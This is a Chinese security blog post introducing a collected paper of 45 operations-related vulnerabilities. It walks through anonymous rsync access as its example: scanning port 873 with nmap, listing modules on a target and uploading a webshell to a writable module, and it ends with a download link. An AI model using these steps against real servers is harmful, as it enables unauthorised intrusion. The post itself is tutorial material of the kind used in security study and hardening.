【漏洞赏析】安全运维那些洞

2018-06-12 10:20:59 浏览数 (1)

0x00 缘由

有人说:编程是一种美,是一门艺术,享受其中思维的妙曼身姿,一个有灵魂的程序猿叫做万物的“造物主”;

而我说:漏洞是一种美,是一个世界,畅游于黑暗的世界里探索,一个有个性的白帽子叫做世间的“救世主”。

0x01 概括

不知从何时起,养成了一个喜欢看“漏洞”的习惯,乌云的离开让很多人伤心而遗憾。不知从何时起,养成了一个喜欢记笔记、总结、思考的习惯,于是有了今天这份paper:

或许,很多朋友已经看到过标题,因为之前没有自己的公众号在T00Ls发过,后来又被人转到过爱春秋。现在打算开始尝试公众号,想起是时候把它纳入怀中了。

0x02 结构

这份 paper 没有太多个人思路,但却不失某一漏洞的利用方法及遇到的问题(当时有的没有解决,然而后来也没有继续补充)。仅单纯的按照自己的思路,记录和总结常见的运维相关安全漏洞。难免会有错误与不足(包括不全面)之处,还请大家不吝赐教。

1)很早之前为止,共收集运维相关漏洞45例

2)每例结构分为:基础知识、漏洞利用、实战演练(及修复方案)

以rsync匿名访问为例:

--1 基础知识

rsync 是一个远程数据同步工具,用 “rsync 算法”提供了一个客户机和远程文件服务器的文件同步的快速方法,在同步文件的同时,可以保持原来文件的权限、时间、软硬链接等附加信息。

下载文件:

./rsync -vzrtopg --progress --delete username@xxx.xxx.xxx.xxx::out /home/test/getfile

上传文件:

/user/bin/rsync -vzrtopg --progress /home/test/getfile username@xxx.xxx.xxx.xxx::out

--2 利用方法

rsync 默认端口是 873,可使用 nmap 进行扫描:

nmap –n –open –p 873 x.x.x.x/24

尝试上传、下载文件( kali 中):rsync 10.210.208.39::

或 rsync –vvvv rsync://10.210.208.39::

--3 实战演练

获取文件信息找到网站目录:# rsync -v xx.xx.xx.xx::

同步本地大马至远程服务器,上传webshell

# rsync -av /root/Desktop/youxiu.aspx xx.xx.xx.xx::Etest

确认是否成功: # rsync -v xx.xx.xx.xx::Etest

获取目标webshell:

3)每例中可能是一类漏洞的集合

比如struts漏洞:

又如web服务器解析漏洞:

0x03 结语

以上漏洞大餐可能时间较久,如果有想继续完善的朋友可以留言。

下载链接如下(下载即同意以上PS中的内容):

链接: https://pan.baidu.com/s/1o8mlfAE 密码: mk4d

0 人点赞